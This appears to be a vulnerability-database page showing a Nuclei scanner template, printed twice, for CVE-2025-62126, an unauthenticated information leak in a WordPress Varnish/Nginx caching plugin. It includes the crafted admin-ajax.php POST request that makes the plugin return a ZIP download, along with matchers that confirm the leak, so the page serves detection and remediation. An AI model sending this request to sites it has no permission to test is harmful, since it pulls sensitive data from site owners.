WordPress Varnish/Nginx Proxy Caching <= 1.8.3 - Information Exposure

CVE-2025-62126

Verified

Description

Razvan Stanga Varnish/Nginx Proxy Caching <= 1.8.3 contains an insertion of sensitive information into sent data vulnerability caused by improper handling of embedded sensitive data, letting attackers retrieve sensitive information, exploit requires crafted requests.

Severity

Medium

CVSS Score

5.3

Exploit Probability

Affected Product

varnish-caching-wordpress-plugin

Published Date

March 26, 2026

Template Author

pussycat0x

CVE-2025-62126.yaml

id: CVE-2025-62126

info:
  name: WordPress Varnish/Nginx Proxy Caching <= 1.8.3 - Information Exposure
  author: pussycat0x
  severity: medium
  description: |
    Razvan Stanga Varnish/Nginx Proxy Caching <= 1.8.3 contains an insertion of sensitive information into sent data vulnerability caused by improper handling of embedded sensitive data, letting attackers retrieve sensitive information, exploit requires crafted requests.
  remediation: |
    Update to the latest version beyond 1.8.3.
  impact: |
    Attackers can retrieve embedded sensitive information, potentially leading to data leakage.
  reference:
    - https://github.com/razvanstanga/varnish-caching-wordpress-plugin/pull/15
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/vcaching/varnishnginx-proxy-caching-183-unauthenticated-information-exposure
    - https://nvd.nist.gov/vuln/detail/CVE-2025-62126
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-62126
    epss-score: 0.03313
    epss-percentile: 0.87405
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 1
    vendor: razvanstanga
    product: varnish-caching-wordpress-plugin
    framework: wordpress
  tags: cve,cve2025,wordpress,wp,wp-plugin,vcaching,exposure

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=varnish_caching_download&option_page=varnish_caching_download&varnish_caching_varnish_version=4

    matchers-condition: and
    matchers:
      - type: binary
        part: body
        binary:
          - "504b0304"

      - type: word
        part: content_type
        words:
          - "application/zip"
          - "application/octet-stream"
        condition: or

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: filename
        part: header
        group: 1
        regex:
          - 'filename="?([^";\r\n]+)'
# digest: 4a0a004730450221009591406534b5666e81aacc27a86e8988fc85b4c10519c98f40fe5430639fbcca0220033ca9a2f768206b7cc2a5a897a2ae0e704748ce1c366b980f04f2af21800df1:922c64590222798bb761d5b6d8e72950

5.3Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE ID:

cve-2025-62126

CWE ID:

cwe-200

References

https://github.com/razvanstanga/varnish-caching-wordpress-plugin/pull/15 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/vcaching/varnishnginx-proxy-caching-183-unauthenticated-information-exposure https://nvd.nist.gov/vuln/detail/CVE-2025-62126

Remediation Steps

Update to the latest version beyond 1.8.3.

id: CVE-2025-62126

info:
  name: WordPress Varnish/Nginx Proxy Caching <= 1.8.3 - Information Exposure
  author: pussycat0x
  severity: medium
  description: |
    Razvan Stanga Varnish/Nginx Proxy Caching <= 1.8.3 contains an insertion of sensitive information into sent data vulnerability caused by improper handling of embedded sensitive data, letting attackers retrieve sensitive information, exploit requires crafted requests.
  remediation: |
    Update to the latest version beyond 1.8.3.
  impact: |
    Attackers can retrieve embedded sensitive information, potentially leading to data leakage.
  reference:
    - https://github.com/razvanstanga/varnish-caching-wordpress-plugin/pull/15
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/vcaching/varnishnginx-proxy-caching-183-unauthenticated-information-exposure
    - https://nvd.nist.gov/vuln/detail/CVE-2025-62126
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-62126
    epss-score: 0.03313
    epss-percentile: 0.87405
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 1
    vendor: razvanstanga
    product: varnish-caching-wordpress-plugin
    framework: wordpress
  tags: cve,cve2025,wordpress,wp,wp-plugin,vcaching,exposure

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=varnish_caching_download&option_page=varnish_caching_download&varnish_caching_varnish_version=4

    matchers-condition: and
    matchers:
      - type: binary
        part: body
        binary:
          - "504b0304"

      - type: word
        part: content_type
        words:
          - "application/zip"
          - "application/octet-stream"
        condition: or

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: filename
        part: header
        group: 1
        regex:
          - 'filename="?([^";\r\n]+)'
# digest: 4a0a004730450221009591406534b5666e81aacc27a86e8988fc85b4c10519c98f40fe5430639fbcca0220033ca9a2f768206b7cc2a5a897a2ae0e704748ce1c366b980f04f2af21800df1:922c64590222798bb761d5b6d8e72950

WordPress Varnish/Nginx Proxy Caching <= 1.8.3 - Information Exposure

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

WordPress Varnish/Nginx Proxy Caching <= 1.8.3 - Information Exposure

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps